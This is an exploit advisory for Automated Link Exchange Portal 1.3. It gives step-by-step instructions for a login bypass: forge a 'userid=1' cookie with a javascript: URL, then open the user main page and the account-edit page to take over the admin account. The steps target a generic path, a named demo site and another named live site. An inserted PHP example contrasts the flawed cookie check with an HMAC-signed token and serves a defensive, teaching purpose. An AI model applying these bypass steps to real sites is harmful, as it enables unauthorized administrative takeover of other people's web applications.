Automated link exchange portal 1.3 - Multiple Vulnerabilities

Author: TiGeR-Dz
type: webapps
platform: php
date_added: 2009-06-07  
verified: 1  

raw file: 8904.txt  
-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home:www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download:http://www.cmsnx.com/product.demo.php?id=11
 A thousand congratulations on the national team's win :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note: follow these steps.

 After setting the cookie (javascript:document.cookie="userid=1;path=/";), go
 to http://www.site.com/[path]/user.mainpage.php to log in, then change the admin profile at
 http://www.site.com/[path]/user.edit.account.php

 exploit = cookie handling + login bypass + profile change :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php

 ----------------------------------------------------------------

 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php
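
The steps above work only if the application accepts the `userid` cookie as proof of identity. The following is an added example, not code from Automated Link Exchange Portal or from this advisory: the assumed vulnerable check beside a hardened one that accepts only a server-issued, HMAC-signed token. The function names, the `auth` cookie name and the token layout are assumptions; a server-side PHP session populated after password verification is the other standard fix.

```php
<?php
declare(strict_types=1);
// Added example (hypothetical reconstruction, not the portal's source).

// Assumed vulnerable pattern: whoever sends userid=1 is treated as user 1.
function current_user_vulnerable(array $cookies): ?int
{
    return isset($cookies['userid']) ? (int) $cookies['userid'] : null;
}

// Hardened: issued only after the password check succeeds. The token is
// "userid.expiry.mac", where mac = HMAC-SHA256(key, "userid.expiry").
function issue_token(int $userId, string $key, int $now, int $ttl = 1800): string
{
    $payload = $userId . '.' . ($now + $ttl);
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

// Returns the authenticated user id, or null if the token is absent,
// malformed, forged or expired.
function current_user_hardened(array $cookies, string $key, int $now): ?int
{
    $raw = $cookies['auth'] ?? null;
    if (!is_string($raw)
        || !preg_match('/\A(\d{1,10})\.(\d{1,10})\.([0-9a-f]{64})\z/', $raw, $m)) {
        return null;
    }
    $expected = hash_hmac('sha256', $m[1] . '.' . $m[2], $key);
    if (!hash_equals($expected, $m[3])) {   // constant-time comparison
        return null;
    }
    return ((int) $m[2] >= $now) ? (int) $m[1] : null;
}

// Constructed demo values, runnable with `php example.php`.
$key = random_bytes(32);          // server-side secret, never sent to clients
$now = time();
$forged = ['userid' => '1', 'auth' => '1.' . ($now + 60) . '.' . str_repeat('0', 64)];
$issued = ['auth' => issue_token(1, $key, $now)];

var_dump(current_user_vulnerable($forged));           // cookie from the advisory
var_dump(current_user_hardened($forged, $key, $now)); // guessed MAC
var_dump(current_user_hardened($issued, $key, $now)); // token issued at login
```

The same guard belongs on every page that acts for a user, user.edit.account.php included, and a change to account details should additionally require the current password.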

----------------------------------------------------------
 Dem0
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php

 ----------------------------------------------------------------

 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]